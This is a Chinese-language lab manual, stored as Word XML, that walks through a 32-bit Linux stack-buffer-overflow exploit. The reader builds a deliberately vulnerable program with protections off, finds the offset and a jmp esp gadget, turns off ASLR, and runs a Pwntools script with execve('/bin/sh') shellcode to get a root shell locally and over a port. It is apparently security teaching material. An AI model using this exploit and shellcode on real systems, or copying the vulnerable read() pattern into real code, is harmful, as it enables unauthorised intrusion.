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312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任务一：对无任何防护的系统进行 Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288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—— 实验实操详细步骤与注意事项（Linux 栈溢出利用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="100" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:keepNext/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>一、实验概述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1.1 实验目的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本实验以存在缓冲区溢出漏洞的 level1 程序为对象，在关闭全部安全防护的条件下，完成一次完整的栈溢出利用，使读者掌握以下能力：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（1）理解缓冲区溢出的基本原理，以及 read() 函数造成的栈溢出问题；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（2）掌握使用 gcc 编译时关闭 NX、Stack Protector 等防护的方法；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（3）掌握使用 pattern.py 与 GDB 定位溢出点（返回地址覆盖偏移）的方法；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（4）掌握使用 EDB 调试器在内存中搜索跳转指令（jmp esp）的方法；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（5）掌握使用 Pwntools 框架编写 Exploit，并完成本地与远程攻击、获取 Shell 的完整流程。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1.2 实验环境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本实验在 Kali Linux 系统中完成，需准备以下工具与条件：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tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737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381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工具/条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5669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38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Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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实验操作系统，默认自带大部分工具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38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gcc 编译器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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用于编译 C 程序（可包含 32 位支持）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38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GDB + PEDA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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调试器及其增强插件，用于查看防护属性与寄存器状态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38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pattern.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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生成/解析定位字符串的脚本，用于计算溢出偏移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38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EDB 调试器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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图形化调试器，用于搜索 jmp esp 等指令（OpcodeSearcher 插件）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38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Pwntools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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CTF 漏洞利用开发库，用于编写 Exploit 脚本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38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socat、nc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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用于远程测试时将目标程序绑定到端口并访问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38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root 权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="566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关闭 ASLR 及获取高权限 Shell 需要 root 权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pP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1.3 实验原理简述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level1.c 中，函数 vulnerable_function() 定义了一个 128 字节的缓冲区 buf，但使用 read(STDIN_FILENO, buf, 256) 最多读入 256 字节的数据。当输入数据超过 128 字节时，多余数据会覆盖缓冲区之后相邻的栈空间，包括保存的 EBP 和函数返回地址（EIP）。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由于编译时关闭了 NX 防护（-z execstack 使栈可执行），攻击者可以在输入中插入一段 shellcode（机器码），并利用跳转指令（jmp esp）使程序跳到栈上执行 shellcode，从而获得一个 /bin/sh 交互 Shell，实现提权（程序为 root 权限时，获得的 Shell 即为 root）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="100" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:keepNext/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>二、详细实操步骤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2.1 步骤一：编写实验程序 level1.c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在工作目录（如 /root/rop）下创建源码文件 level1.c，代码如下：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undef _FORTIFY_SOURCE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include &lt;stdio.h&gt;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include &lt;stdlib.h&gt;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include &lt;unistd.h&gt;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void vulnerable_function() {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 xml:space="preserve">    char buf[128];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 xml:space="preserve">    read(STDIN_FILENO, buf, 256);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}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int main(int argc, char **argv) {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 xml:space="preserve">    vulnerable_function();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 xml:space="preserve">    write(STDOUT_FILENO, "Hello, World\n", 13);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}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说明：vulnerable_function() 中 buf 只有 128 字节，但 read() 允许读入 256 字节，这是本实验的漏洞点（栈缓冲区溢出）。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2.2 步骤二：编译程序，关闭系统防护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使用 gcc 编译 level1.c，生成可执行文件 level1，命令如下：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gcc -fno-stack-protector -z execstack -o level1 level1.c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其中，-fno-stack-protector 参数用于关闭 Stack Protector（栈保护，即关闭 CANARY 金丝雀检测）；-z execstack 参数用于关闭 NX（非可执行栈）防护，使栈内存可执行。只有同时关闭这两项防护，后续的栈溢出利用才能成功。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2.3 步骤三：使用 checksec 查看程序防护属性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在 GDB 中使用 checksec 指令查看程序的安全防护属性，命令与预期输出如下：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gdb level1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gdb-peda$ checksec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CANARY : disabled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FORTIFY : disabled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NX : disabled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PIE : disabled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RELRO : disabled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由输出可知，CANARY、FORTIFY、NX、PIE、RELRO 五项防护均处于 disabled（关闭）状态，确认这是一个无任何防护的测试程序。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2.4 步骤四：使用 pattern.py 生成定位字符串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为准确确定溢出点（返回地址被覆盖的偏移量），使用 pattern.py 脚本创建一个长度为 150 字节的定位字符串，命令如下：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python pattern.py create 150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运行后将生成一串形如 Aa0Aa1Aa2Aa3… 的特征字符串（如图 10-8 所示）。该字符串的每一段位置都是可计算、可定位的，便于后续反查偏移。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2.5 步骤五：GDB 调试，触发段错误并记录出错地址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在 GDB 中运行程序，并输入上面生成的定位字符串：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gdb level1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gdb-peda$ r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Starting program: /root/ROP/level1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Aa0Aa1Aa2Aa3Aa4Aa5……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Program received signal SIGSEGV, Segmentation fault.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程序发生段错误后，查看寄存器输出，重点关注 EIP 与 EBP：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[------------------------------ registers ------------------------------]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EAX: 0x97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EBX: 0x0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ECX: 0xbffff2d0 ("Aa0Aa1Aa2…7Ad8Ad9Ae0Ae1Ae2Ae3Ae…04\\004\\b")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EDX: 0x100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EBP: 0x65413565 ('e5Ae')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ESP: 0xbffff300 ("Ae8Ae9\\n\\bi\\204\\004\\b")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EIP: 0x37654136 ('6Ae7')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EFLAGS: 0x10207 (... )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此时内存出错的地址为 0x37654136（即 EIP 的值），这串字符“6Ae7”来自定位字符串，说明 EIP 已被定位字符串覆盖。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2.6 步骤六：计算偏移并验证返回地址覆盖位置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使用 pattern.py 的 offset 功能，根据出错地址反查其在定位字符串中的位置，即可得到返回地址的覆盖偏移量：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python pattern.py offset 0x37654136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计算结果表明，PC（返回地址/EIP）的覆盖点为 140 字节，即输入的前 140 字节会覆盖到返回地址，第 141～144 字节正好填入返回地址的位置。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为验证这一结论，构造 A*140+BBBB 的输入进行测试：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python pattern.py create 140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gdb level1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Starting program: /root/rop/level1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Aa0Aa1Aa2Aa3Aa4Aa5…3Ae4Ae5AeBBBB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Program received signal SIGSEGV, Segmentation fault.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EIP: 0x42424242 ('BBBB')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运行后 EIP 显示为 0x42424242，即 ASCII 字符“BBBB”，证明返回地址确实在第 140 字节处被覆盖，偏移量确定为 140 字节。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2.7 步骤七：使用 EDB 调试器查找 ret（jmp esp）指令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由于程序关闭了 PIE 防护、栈地址固定，且我们希望在返回后跳转到栈上执行 shellcode，需要找到一个“jmp esp”（或 push esp; ret）指令作为跳板。使用 EDB 调试器完成查找：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（1）用 EDB 加载程序 level1 并运行；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（2）单击菜单栏 Plugins，在下拉菜单中选择 OpcodeSearcher → Opcode Search 选项（如图 10-9 所示），启动指令搜索插件；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（3）在弹出的 Opcode Search 对话框中，选择 What To Search For 为 ESP -&gt; EIP（即搜索 jmp esp），再选择加载模块 libc-2.23.so，在其所在内存区域中搜索 jmp esp 指令（如图 10-10 所示）；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（4）在搜索结果中选取 b7e06aa9: jmp esp 作为 ret 跳转地址。搜索结果示例如下：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Results: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b7e06aa9: jmp esp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b7edfcab: jmp esp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b7eff4d8: push esp; ret -15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b7f20d66: push esp; ret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b7f4f9b0: call esp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b7f58f7b: call esp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说明：此处选用 b7e06aa9 这个 jmp esp 地址作为返回跳转目标。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2.8 步骤八：关闭 ASLR 内存地址随机化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由于系统启用了 ASLR（地址空间布局随机化）防护，每次程序启动时，libc-2.23.so 模块的加载地址都会变化，导致上面查到的 jmp esp 地址（b7e06aa9）也会随之改变，无法稳定利用。因此需要关闭 ASLR，命令如下：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echo 0 &gt; /proc/sys/kernel/randomize_va_space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写入 0 表示关闭内存地址随机化。此操作需要 root 权限，且重启后可能恢复，实验时注意保持。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2.9 步骤九：编写 Exploit 攻击脚本 expl.py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使用 Pwntools 框架编写攻击脚本 expl.py，代码如下：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coding = utf-8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#!/usr/bin/env python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from pwn import *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p = process('./level1')    # 本地测试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#p = remote('127.0.0.1', 10001)    # 远程测试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ret = 0xb7e06aa9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shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"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shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"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shellcode += "\x0b\xcd\x80"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payload = 'A' * 140 + p32(ret) + shellcode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p.send(payload)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p.interactive()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脚本要点：payload 由 140 字节的填充（'A'*140）覆盖返回地址，接着是 ret 跳转地址 b7e06aa9，最后紧跟 shellcode。p32() 用于把整数地址转换为 32 位小端字节序。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其中 shellcode 机器码对应的汇编代码为：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execve ("/bin/sh")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xor ecx, ecx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mul ecx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push ecx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push 0x68732f2f     # hs//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push 0x6e69622f     # nib/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mov ebx, esp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mov al, 11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int 0x80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该 shellcode 的作用是调用系统调用 execve(“/bin/sh”)，从而启动一个交互式 Shell。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说明：Pwntools 是一个 CTF 框架和漏洞利用开发库，使用 Python 语言开发，旨在让使用者简单快速地编写 Exploit。本地测试使用 process('./level1')，远程测试改为 remote('127.0.0.1', 10001)。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2.10 步骤十：本地测试，获取 Shell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运行 Exploit 脚本，向程序发送 payload：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root@kali:~/rop# python expl.py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[!] Pwntools does not support 32-bit Python. Use a 64-bit release.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[+] Starting local process './level1': pid 1873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[*] Switching to interactive mode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$ id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uid=0(root) gid=0(root) groups=0(root)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$ whoami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root</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr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$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执行 id 或 whoami 命令，显示 uid=0(root)，说明已成功获得 root 权限的交互式 Shell，缓冲区溢出利用成功（如图 10-11 所示）。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2.11 步骤十一：远程测试（socat 绑定端口 + nc 访问）</w:t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实际攻击场景通常针对远程服务。使用 Pwntools 进行远程测试时，指令改为 p = remote('127.0.0.1', 10001)。在使用之前，需要通过 socat 工具把目标程序作为一个服务绑定到服务器的某个端口上，命令如下：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socat TCP4-LISTEN:10001,fork EXEC:./level1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随后，该程序的输入输出（IO）就被重定向到 10001 号端口上，攻击者可以使用 nc 命令访问目标程序的服务：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2F2F2"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:start w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:end w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto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0"/>
              </w:rPr>
              <w:t># nc 127.0.0.1 10001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此时将 expl.py 中的 process 一行注释掉、启用 remote 一行，运行脚本即可对监听在 10001 端口上的目标程序发起远程攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="100" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:keepNext/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>三、注意事项</w:t>
      </w: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3.1 实验环境与权限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blHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737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8050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注意事项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本实验需在 Kali Linux（或兼容 Linux）中完成，且需要 root 权限（关闭 ASLR、获取高权限 Shell 均需 root）。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Pwntools 不支持 32 位 Python，应使用 64 位 Python 环境运行 expl.py，否则会有警告提示。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工具未安装时，应先用 apt 或 pip 安装 gcc、gdb、PEDA、pwntools、EDB、socat、netcat 等，并确认 pattern.py 可执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pP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3.2 编译与防护参数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blHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737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8050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注意事项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编译时必须同时使用 -fno-stack-protector 与 -z execstack，否则程序带防护，利用不会成功。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-fno-stack-protector 关闭栈保护（CANARY）；-z execstack 使栈可执行（关闭 NX）。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若系统默认开启其他防护（如 FORTIFY、PIE），可利用 -fno-stack-protector 之外的参数（如 -no-pie、-U_FORTIFY_SOURCE）进一步关闭，确保 checksec 显示全部 disabled。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pP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3.3 溢出点定位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blHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737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8050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注意事项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pattern.py create 生成的字符串长度应大于可能的偏移量（本实验取 150，覆盖 140 偏移绰绰有余）。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通过 pattern.py offset &lt;出错地址&gt; 反查偏移时，必须使用 GDB 中 EIP 的实际出错地址，不能凭猜测。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构造 A*140+BBBB 验证时，若 EIP 显示为 0x42424242（BBBB），说明偏移计算正确；否则需重新核对。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pP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3.4 地址与 ASLR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blHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737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8050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注意事项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jmp esp 地址（b7e06aa9）来自 libc 模块，会随 ASLR 变化，利用前必须用 echo 0 &gt; /proc/sys/kernel/randomize_va_space 关闭 ASLR。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关闭 ASLR 后需确认写入成功（可 cat 查看该文件内容是否为 0）；系统重启后该设置可能恢复，需重复关闭。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不同系统/内核版本下 libc 加载基址可能不同，EDB 搜索结果中的 jmp esp 地址应以实际搜索为准。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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3.5 shellcode 与 payload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blHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737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8050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注意事项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shellcode 必须完整、正确（本实验为 21 字节的 execve(“/bin/sh”) 机器码），缺失或写错字节会导致无法获取 Shell。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payload 的结构为：140 字节填充 + 4 字节返回地址（小端）+ shellcode，三者顺序不能颠倒。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p32(ret) 用于将地址转换为 32 位小端序；若平台为 64 位需使用 p64()，且注意栈结构差异。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:keepNext/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.6 工具与版本差异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blHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737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8050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注意事项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EDB 的 OpcodeSearcher 插件需通过 Plugins 菜单手动启用，选择 ESP-&gt;EIP 与加载模块 libc-2.23.so 后搜索。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远程测试依赖 socat 将程序绑定到端口，绑定前确保端口未被占用；nc 访问成功后程序 IO 重定向到该端口。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8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不同教材/工具版本（如 libc 版本、PEDA、pwntools）下的命令细节可能略有差异，以实际环境为准。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="100" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:keepNext/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>四、常见问题排查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tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551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现象</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835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可能原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D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排查与解决方法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 expl.py 后未获得 Shell，程序直接退出</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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关闭 ASLR 未生效；或 jmp esp 地址不正确</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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重新执行 echo 0 &gt; /proc/sys/kernel/randomize_va_space 并确认；用 EDB 重新搜索确认 b7e06aa9 地址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段错误地址不固定，每次都不同</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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ASLR 未关闭或程序开启了 PIE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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关闭 ASLR；编译时加入 -no-pie 关闭 PIE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EIP 未被预期的 BBBB 覆盖</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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输入长度或偏移计算有误</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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 pattern.py offset 重新精确计算偏移，并用 A*140+BBBB 验证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提示 Pwntools 不支持 32 位 Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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使用了 32 位 Python 运行脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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改用 64 位 Python 运行 expl.py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远程连接失败或超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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端口未绑定、防火墙拦截或程序未运行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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确认 socat 命令执行成功、端口未被占用，用 nc 127.0.0.1 10001 先本地测试连通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shellcode 执行后无反应</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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shellcode 字节错误或 payload 顺序不对</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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对照标准 execve(“/bin/sh”) shellcode 逐字节核对，确认 payload 为填充+地址+shellcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pP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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>提示：本实验仅用于教学与安全测试场景，请在获得授权的实验环境（如 Kali 虚拟机）中完成，切勿对未授权系统实施攻击。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20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60" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体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